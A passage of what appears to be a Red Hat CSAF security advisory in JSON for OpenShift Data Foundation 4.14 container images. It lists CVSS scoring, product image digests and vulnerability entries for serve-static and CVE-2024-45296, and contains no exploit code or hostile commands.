"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.0,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:08a046ba8c5a9284e7fc9263f51eee40a5203c5d41c25ac2df555694dbd5a395_s390x",
"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:6b2cb0576d635bfeef719847a6b3a651b5527a0336fe57548ae609025ddb2016_amd64",
"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:984f5852a4793d9883106ccca492b1daab60d3c85f21ad667f92efbe8e5d1c50_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:0f8ea96fc58192660d845131c760a258a8e33fc02fc85884aa9be5ea07fd5e26_arm64",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:1f9ed27e2bd7b881aa5bc06571cf1cd459d577746e01f388bef01679013958f5_s390x",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:a665d06e0ec627db26cf47e0e19a36793f185fbf7dcb2a756983b0c08d041a09_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:e33c0ee4709e501d0a25c9da0089cb28b79ee80d28706465b55b9b17f807d260_amd64",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8d8230c10fa25e17fdac866971ecbdcec369e998f4f965eab27abab46d1eaf4d_amd64",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8dbb2f97682ab4a0f88e4b63485738f591a002faded8d1e5a01f918abd0a22b5_arm64",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:bc5578e6f07cd0692abd897bf25b99361f1044a10ddcefefae13d3af338b3d58_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:cf73fc2fa89884542a1f0e333bd9e1dd587a05e86442d67a316cd1c1d26c925d_s390x",
"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a42cd3a47eae7d05c44b438321da63faaee8274e4099171ec30c75005526f05d_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a73e671a9db5b88691800cefb2c903e7012499bc857e6cca62af958a35b5eab6_s390x",
"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:f034e4be8b4e4e29ae79b12b800bf9ea682fa006a3ba6e84f42e06167a239750_amd64",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:0af9a6828abb53c18dae132b6a91862a85b5ad0b3f3ffbded002955af2fd04e2_s390x",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:1e20312fdd047dfd87b67d0bdc6a493df330c58671bcd0e078f22686df4a8d66_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:bb82af60a467551305c8628e6c8bac0b0d01637a0fb04b4142e69c90d3003434_arm64",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:fc98e8793dac5fcdb663967a7fd27c03d4cbb38295a5b1138f30cc1936bec92b_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:3d2aba1307256ae6ee3a2dffaf0d175f7d204f7484712c1ec083d74203de2cb8_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:5e05fc58b6b37b6e6f45a0042d3b167760fcc3dd5d14f4620a889d5feb90ae76_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:f5976d4c7303ddb27dd91f33517af1e74cdf42e3539219c30c0c87408a085f95_s390x",
"9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:23aad767b433979e8465b4420278bf41a729e32530f80ef3bb3e98466afca95f_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:3e398e98250d9638c8ad75bf88ae2cb936d499c1ebf0d0cc897ce37fbb25b42b_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:59921e0c5c495c57a8efd9022b95bf0964fff99ba6f207cd49ed3b0112189f45_s390x",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:12fa0510c846a2f2d7984ab844faf117848aa9b70bf1642e140a20729fea3b4a_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:aeabac054147c3be143ddfcc48702332a58d17a31e461c1cf863fa273a5364e0_arm64",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:afcecc910feb27ffc8c48ce6aa52f2d305fd785b7a31e8d035d14f771f9993ae_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:f0fab98314e526b530a06a4859cab011647358ea65827288bd12d97ac1cf6e38_s390x",
"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:06c5ad2463ba39e95ad251fd388b2c604deec27da05ef2c4d98952173eb56787_s390x",
"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:9038bc5b6d2713e79672f2f574ebe849bb15dccc025a38fc2380e443430f05e6_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:cfbbab395069de17bb86357e54d2a6a89e5fe671b938b7a42e4c8ab1eb951e49_amd64",
"9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:3d161f9b4d88c502382b32abe4392af4a5b141fa11851f335f32745c090971a5_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:a967f7349b22cc96c11191bf31c002ef6fec7fd4214398df29ecdb7c72d4718c_s390x",
"9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:b2cf0ade1d9c2e16e4fec4e2886691f5e4d95210bdf68377cd22aa6a3bd409d4_amd64",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:215778987ac0f6449b168481b84a8b253cd4577711055ca66d259fdbf37e9af9_s390x",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:60b08d3094ed01d2e5570973964f08cd9a81c794b1e187d595dc735436004cc2_arm64",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:7c98d7e882e06d09322f9eefcd67a26a9b96e81708a1c2d9095c93e280bee66a_amd64",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:e81785d999d583b8a57e6be3eecc7edfa042552e4ae0c2a18460316a68828fb1_ppc64le",
"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:521022da39600a31fd4f1e3f72cfbc5c9315a53de21df57be71a63e4050a4491_ppc64le",
"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:88ddde7411b0ce4b0edd53e0b64c76afa8038fc4a8aa1450220e515759c30036_amd64",
"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:9c676d4cea288ae80afe61e6c2c2009da9969508aebd8eebce0f21513ba505f9_s390x",
"9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:7bd34f3be6e5a6e689ede195ef1b29843b5eb0cf839021816c7e57819b0d496e_s390x",
"9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:cada6c55b8adbafd7238399b13748432b4e2937eb5aa7b1c0d40573983f4b953_amd64",
"9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:df2648d2c5f839bde961fe8e3badbaf6cf72c7b62c133b1cb27c4ee7e66ac5f0_ppc64le",
"9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:b16ddba3e229faf0aa5d01f0dd6452872c6a44679a74359979a9c09c595bbcc8_s390x",
"9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:c4b1229ac6308e623a660b37b3f52870eac8c9566d2068173ffadc52aee8da12_ppc64le",
"9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:ef593bb97792c40a0706924dbfbc9dd0072d0889b92678b8ebaf55227d66f5a4_amd64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:326cb06c987e275b1c1c7c9fef1e96d343223ee150ed3c58cfc42ccf4765fe03_ppc64le",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:3366ad94a8cba707735d4cbbc692221b62a5fbef387edb70e3660f55ae718e7a_arm64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:ccd9cdb192b4275b9c7bb58b72df90df0ad6ff807e2f00ed04710655042f66d5_amd64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:f3ab303fdafcbef708c92a33ad0775fdae4744735ae600e7aa692e62a7fade10_s390x",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:09d88b10bd0e674f5d0efae7b6a2d98db7634e2b594a44dbdae35d6a872fb0c0_amd64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:4e2db57173669e54f65196c175d5e47e74076d8164f57f90da86fcef8aa92281_arm64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:5d8e98b7f5b07f77e707cf73673dcf4648624da51d34d561d6bdc2b3fde8f541_s390x",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:bac9dfa4b2d31316e0fcabc3e2c87c830c7e410d0b9c0e485ae62ea4da79d2c4_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:171817821112bd026a41faae5cf98fd06ed5d0cf063d622f24fa695bcb1213b4_amd64",
"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:68c42668721898d68bc3b255bedca2124dee662626542793c9bfadc520d473c8_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:85505b18dc32d34de3f9d6ca779acc84e8c500f106460502597f00fe8626509b_s390x",
"9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:11968f525a32bdd28d90ecc8b0eb32838c4eab155a77f0453685dc346f5c106d_amd64",
"9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:389291fcc275966724880ec3f8b6732020027e162e515684e889a76c686d8163_s390x",
"9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:73448db0de00c6a40ed20d0d167b7e98f89c8e3eebc45f675cc210e27bd95c0c_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:08bd33241646abb79e57a6de5aac3611f0f3238c11dfa76bd135e8fc745eaf97_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:2baf3d66710d7673ea20562912597b058a3d0a9b428bdf1ba792d0624c31f284_s390x",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:59e97364ffd0cf0b64f95cbb65dcfcac7d982bffc98dd87e64a5c0e0d114e36b_arm64",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:eb4626677b340ac11237dc9269071732b45642238afb3afdabe7acf535464fda_amd64",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:1318f5f3119a2b9a5b22e7687d3b1d5212394dda2d95b6e02c98b8ffcb87660f_amd64",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:722eadfcf62be37bf9d714ac4336440ed98615269423c3ba3b65b70b6c6acd29_arm64",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:a0ef2966b464a5602ab2d936772dc74ca55212a11c0ec0f19db5ff61d66c2980_ppc64le",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:d64b01bd4ace2795a62a7bfb2b385930e46f76eb12cede706d10b16ba0707750_s390x",
"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:26459b59f76a3e8cc6fed7907b044921fa61a27d91c3b174ea7f35d120d99a6e_ppc64le",
"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:4412748a0cf46c60539a4fefdc8390040a5c61fa8eee6137a8a402dcef9ddb01_amd64",
"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:b9c877af1b71bf3ec5f6025353c9d9b37e457e120ea0815c9090490a6b2217fd_s390x",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:168d1924a17a77cc3a473bf48a90bfd3cb3134d30a667cbbf378fc96b3ad5803_amd64",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:4a42286f3a5c31625fe29085c81627325006d6c1b63e8ad3c90b2bfa383b2439_s390x",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:7609f4687626d3b178e211cc587b642acc688acd17274551bde6828ca5e702e5_ppc64le",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:d1c814e55d7f91d8b096bf0983041e678ece0034fb3990630565ae32791d5d7c_arm64",
"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:91bf46b7a774f08aba77f25203cb4bfa2aa44073a50807b942190702c2364eff_s390x",
"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:a79234b0659b2e45b7661a7b86f658dedc01e7b9ff858251a26dab3a42650993_amd64",
"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:de86c539ff9dfe81d04cecee6fbd6ded1e8b4a3b598d855aa5c6baa98cf10d45_ppc64le",
"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:14c3b888aff944bafe415da999e6c4d43f830f4ebe7bc1d681f92f0037751687_s390x",
"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:2094cba9cbcf69f44a9176a5f8906f3faa95e0914272922311d0a9a28ca437bf_ppc64le",
"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:ad8244e09fdbd18c7c9ee1bd398fbb36fbc403fba0e59553d037018351dba05d_amd64",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:06b747af12530dd66554af69f072c35622fb57fbff9094b71dcc379ef13faa71_ppc64le",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:6447bd5f6546704b4b8762c8c00dcd27141a0943fea33a02ee621087b4f353cf_s390x",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:8be0734337b11f5bb35cdbd93dc3b93d37c66770b238bd26de673026ef201e62_arm64",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:c49b2c30b19d5f0c13782910214819fc1a18b48c0f8a0d3064b2b4af24e1567f_amd64",
"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:057af5f435a7ed786bdca3db5219fc58152dbe4e9afa997b91e5f6e930534025_amd64",
"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:210ff59e38d274b3ad678b826078bdc896cb5f950ad2221724c03bda6939138b_ppc64le",
"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:df1f250b1d40440eb8a5d97f3c2641f01b81d99fd67c42d14c6f89183f5486fd_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "serve-static: Improper Sanitization in serve-static"
},
{
"cve": "CVE-2024-45296",
"cwe": {
"id": "CWE-1333",
"name": "Inefficient Regular Expression Complexity"
},
"discovery_date": "2024-09-09T19:20:18.127723+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:08a046ba8c5a9284e7fc9263f51eee40a5203c5d41c25ac2df555694dbd5a395_s390x",
"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:6b2cb0576d635bfeef719847a6b3a651b5527a0336fe57548ae609025ddb2016_amd64",
"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:984f5852a4793d9883106ccca492b1daab60d3c85f21ad667f92efbe8e5d1c50_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:0f8ea96fc58192660d845131c760a258a8e33fc02fc85884aa9be5ea07fd5e26_arm64",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:1f9ed27e2bd7b881aa5bc06571cf1cd459d577746e01f388bef01679013958f5_s390x",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:a665d06e0ec627db26cf47e0e19a36793f185fbf7dcb2a756983b0c08d041a09_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:e33c0ee4709e501d0a25c9da0089cb28b79ee80d28706465b55b9b17f807d260_amd64",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8d8230c10fa25e17fdac866971ecbdcec369e998f4f965eab27abab46d1eaf4d_amd64",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8dbb2f97682ab4a0f88e4b63485738f591a002faded8d1e5a01f918abd0a22b5_arm64",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:bc5578e6f07cd0692abd897bf25b99361f1044a10ddcefefae13d3af338b3d58_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:cf73fc2fa89884542a1f0e333bd9e1dd587a05e86442d67a316cd1c1d26c925d_s390x",
"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a42cd3a47eae7d05c44b438321da63faaee8274e4099171ec30c75005526f05d_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a73e671a9db5b88691800cefb2c903e7012499bc857e6cca62af958a35b5eab6_s390x",
"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:f034e4be8b4e4e29ae79b12b800bf9ea682fa006a3ba6e84f42e06167a239750_amd64",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:0af9a6828abb53c18dae132b6a91862a85b5ad0b3f3ffbded002955af2fd04e2_s390x",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:1e20312fdd047dfd87b67d0bdc6a493df330c58671bcd0e078f22686df4a8d66_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:bb82af60a467551305c8628e6c8bac0b0d01637a0fb04b4142e69c90d3003434_arm64",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:fc98e8793dac5fcdb663967a7fd27c03d4cbb38295a5b1138f30cc1936bec92b_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:3d2aba1307256ae6ee3a2dffaf0d175f7d204f7484712c1ec083d74203de2cb8_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:5e05fc58b6b37b6e6f45a0042d3b167760fcc3dd5d14f4620a889d5feb90ae76_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:f5976d4c7303ddb27dd91f33517af1e74cdf42e3539219c30c0c87408a085f95_s390x",
"9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:23aad767b433979e8465b4420278bf41a729e32530f80ef3bb3e98466afca95f_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:3e398e98250d9638c8ad75bf88ae2cb936d499c1ebf0d0cc897ce37fbb25b42b_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:59921e0c5c495c57a8efd9022b95bf0964fff99ba6f207cd49ed3b0112189f45_s390x",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:12fa0510c846a2f2d7984ab844faf117848aa9b70bf1642e140a20729fea3b4a_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:aeabac054147c3be143ddfcc48702332a58d17a31e461c1cf863fa273a5364e0_arm64",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:afcecc910feb27ffc8c48ce6aa52f2d305fd785b7a31e8d035d14f771f9993ae_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:f0fab98314e526b530a06a4859cab011647358ea65827288bd12d97ac1cf6e38_s390x",
"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:06c5ad2463ba39e95ad251fd388b2c604deec27da05ef2c4d98952173eb56787_s390x",
"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:9038bc5b6d2713e79672f2f574ebe849bb15dccc025a38fc2380e443430f05e6_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:cfbbab395069de17bb86357e54d2a6a89e5fe671b938b7a42e4c8ab1eb951e49_amd64",
"9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:3d161f9b4d88c502382b32abe4392af4a5b141fa11851f335f32745c090971a5_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:a967f7349b22cc96c11191bf31c002ef6fec7fd4214398df29ecdb7c72d4718c_s390x",
"9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:b2cf0ade1d9c2e16e4fec4e2886691f5e4d95210bdf68377cd22aa6a3bd409d4_amd64",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:215778987ac0f6449b168481b84a8b253cd4577711055ca66d259fdbf37e9af9_s390x",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:60b08d3094ed01d2e5570973964f08cd9a81c794b1e187d595dc735436004cc2_arm64",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:7c98d7e882e06d09322f9eefcd67a26a9b96e81708a1c2d9095c93e280bee66a_amd64",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:e81785d999d583b8a57e6be3eecc7edfa042552e4ae0c2a18460316a68828fb1_ppc64le",
"9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:7bd34f3be6e5a6e689ede195ef1b29843b5eb0cf839021816c7e57819b0d496e_s390x",
"9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:cada6c55b8adbafd7238399b13748432b4e2937eb5aa7b1c0d40573983f4b953_amd64",
"9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:df2648d2c5f839bde961fe8e3badbaf6cf72c7b62c133b1cb27c4ee7e66ac5f0_ppc64le",
"9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:b16ddba3e229faf0aa5d01f0dd6452872c6a44679a74359979a9c09c595bbcc8_s390x",
"9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:c4b1229ac6308e623a660b37b3f52870eac8c9566d2068173ffadc52aee8da12_ppc64le",
"9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:ef593bb97792c40a0706924dbfbc9dd0072d0889b92678b8ebaf55227d66f5a4_amd64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:326cb06c987e275b1c1c7c9fef1e96d343223ee150ed3c58cfc42ccf4765fe03_ppc64le",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:3366ad94a8cba707735d4cbbc692221b62a5fbef387edb70e3660f55ae718e7a_arm64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:ccd9cdb192b4275b9c7bb58b72df90df0ad6ff807e2f00ed04710655042f66d5_amd64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:f3ab303fdafcbef708c92a33ad0775fdae4744735ae600e7aa692e62a7fade10_s390x",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:09d88b10bd0e674f5d0efae7b6a2d98db7634e2b594a44dbdae35d6a872fb0c0_amd64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:4e2db57173669e54f65196c175d5e47e74076d8164f57f90da86fcef8aa92281_arm64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:5d8e98b7f5b07f77e707cf73673dcf4648624da51d34d561d6bdc2b3fde8f541_s390x",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:bac9dfa4b2d31316e0fcabc3e2c87c830c7e410d0b9c0e485ae62ea4da79d2c4_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:171817821112bd026a41faae5cf98fd06ed5d0cf063d622f24fa695bcb1213b4_amd64",
"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:68c42668721898d68bc3b255bedca2124dee662626542793c9bfadc520d473c8_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:85505b18dc32d34de3f9d6ca779acc84e8c500f106460502597f00fe8626509b_s390x",
"9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:11968f525a32bdd28d90ecc8b0eb32838c4eab155a77f0453685dc346f5c106d_amd64",
"9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:389291fcc275966724880ec3f8b6732020027e162e515684e889a76c686d8163_s390x",
"9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:73448db0de00c6a40ed20d0d167b7e98f89c8e3eebc45f675cc210e27bd95c0c_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:08bd33241646abb79e57a6de5aac3611f0f3238c11dfa76bd135e8fc745eaf97_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:2baf3d66710d7673ea20562912597b058a3d0a9b428bdf1ba792d0624c31f284_s390x",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:59e97364ffd0cf0b64f95cbb65dcfcac7d982bffc98dd87e64a5c0e0d114e36b_arm64",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:eb4626677b340ac11237dc9269071732b45642238afb3afdabe7acf535464fda_amd64",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:1318f5f3119a2b9a5b22e7687d3b1d5212394dda2d95b6e02c98b8ffcb87660f_amd64",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:722eadfcf62be37bf9d714ac4336440ed98615269423c3ba3b65b70b6c6acd29_arm64",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:a0ef2966b464a5602ab2d936772dc74ca55212a11c0ec0f19db5ff61d66c2980_ppc64le",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:d64b01bd4ace2795a62a7bfb2b385930e46f76eb12cede706d10b16ba0707750_s390x",
"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:26459b59f76a3e8cc6fed7907b044921fa61a27d91c3b174ea7f35d120d99a6e_ppc64le",
"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:4412748a0cf46c60539a4fefdc8390040a5c61fa8eee6137a8a402dcef9ddb01_amd64",
"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:b9c877af1b71bf3ec5f6025353c9d9b37e457e120ea0815c9090490a6b2217fd_s390x",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:168d1924a17a77cc3a473bf48a90bfd3cb3134d30a667cbbf378fc96b3ad5803_amd64",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:4a42286f3a5c31625fe29085c81627325006d6c1b63e8ad3c90b2bfa383b2439_s390x",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:7609f4687626d3b178e211cc587b642acc688acd17274551bde6828ca5e702e5_ppc64le",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:d1c814e55d7f91d8b096bf0983041e678ece0034fb3990630565ae32791d5d7c_arm64",
"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:91bf46b7a774f08aba77f25203cb4bfa2aa44073a50807b942190702c2364eff_s390x",
"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:a79234b0659b2e45b7661a7b86f658dedc01e7b9ff858251a26dab3a42650993_amd64",
"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:de86c539ff9dfe81d04cecee6fbd6ded1e8b4a3b598d855aa5c6baa98cf10d45_ppc64le",
"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:14c3b888aff944bafe415da999e6c4d43f830f4ebe7bc1d681f92f0037751687_s390x",
"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:2094cba9cbcf69f44a9176a5f8906f3faa95e0914272922311d0a9a28ca437bf_ppc64le",
"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:ad8244e09fdbd18c7c9ee1bd398fbb36fbc403fba0e59553d037018351dba05d_amd64",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:06b747af12530dd66554af69f072c35622fb57fbff9094b71dcc379ef13faa71_ppc64le",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:6447bd5f6546704b4b8762c8c00dcd27141a0943fea33a02ee621087b4f353cf_s390x",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:8be0734337b11f5bb35cdbd93dc3b93d37c66770b238bd26de673026ef201e62_arm64",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:c49b2c30b19d5f0c13782910214819fc1a18b48c0f8a0d3064b2b4af24e1567f_amd64",
"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:057af5f435a7ed786bdca3db5219fc58152dbe4e9afa997b91e5f6e930534025_amd64",
"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:210ff59e38d274b3ad678b826078bdc896cb5f950ad2221724c03bda6939138b_ppc64le",
